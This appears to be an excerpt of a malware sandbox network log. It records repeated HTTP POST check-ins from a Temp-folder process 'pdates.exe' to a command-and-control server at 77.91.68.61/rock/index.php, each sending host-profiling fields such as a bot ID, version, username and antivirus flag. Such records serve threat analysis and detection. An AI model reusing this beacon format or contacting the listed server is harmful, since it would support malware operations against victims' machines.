Jul 27, 2023 01:35:53.698868990 CEST	5793	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:53.746115923 CEST	5794	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
649	192.168.2.5	50371	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:53.900831938 CEST	5794	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:53.949822903 CEST	5794	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.5	49782	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:20.938381910 CEST	2909	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:20.986718893 CEST	2910	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
650	192.168.2.5	50372	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:54.103751898 CEST	5795	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:54.153014898 CEST	5795	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
651	192.168.2.5	50373	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:54.302241087 CEST	5796	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:54.350991011 CEST	5796	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
652	192.168.2.5	50374	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:54.506222010 CEST	5797	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:54.555320978 CEST	5797	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
653	192.168.2.5	50375	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:54.708250046 CEST	5798	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:54.756453037 CEST	5798	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
654	192.168.2.5	50376	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:54.916838884 CEST	5799	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:54.965233088 CEST	5799	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
655	192.168.2.5	50377	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:55.135662079 CEST	5800	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:55.186259985 CEST	5800	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
656	192.168.2.5	50378	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:55.335721016 CEST	5801	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:55.384943962 CEST	5801	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
657	192.168.2.5	50379	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:55.548407078 CEST	5802	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:55.596407890 CEST	5802	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
658	192.168.2.5	50380	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:55.793870926 CEST	5803	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:55.843898058 CEST	5803	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
659	192.168.2.5	50381	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:56.008119106 CEST	5804	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:56.057746887 CEST	5804	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.5	49783	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:21.187625885 CEST	2910	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:21.235827923 CEST	2911	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
660	192.168.2.5	50382	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:56.214946032 CEST	5805	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:56.264240980 CEST	5805	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
661	192.168.2.5	50383	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:56.414962053 CEST	5806	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:56.463638067 CEST	5806	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
662	192.168.2.5	50384	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:56.625257969 CEST	5807	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:56.674534082 CEST	5807	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
663	192.168.2.5	50385	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:56.842015982 CEST	5808	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:56.890307903 CEST	5808	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
664	192.168.2.5	50386	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:57.055885077 CEST	5808	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:57.105125904 CEST	5809	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
665	192.168.2.5	50387	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:57.268064022 CEST	5809	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:57.317331076 CEST	5810	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
666	192.168.2.5	50388	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:57.482563972 CEST	5810	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:57.531613111 CEST	5811	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
667	192.168.2.5	50389	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:57.698340893 CEST	5811	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:57.746860981 CEST	5812	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
668	192.168.2.5	50390	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:57.922132969 CEST	5812	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:57.971457005 CEST	5813	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
669	192.168.2.5	50391	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
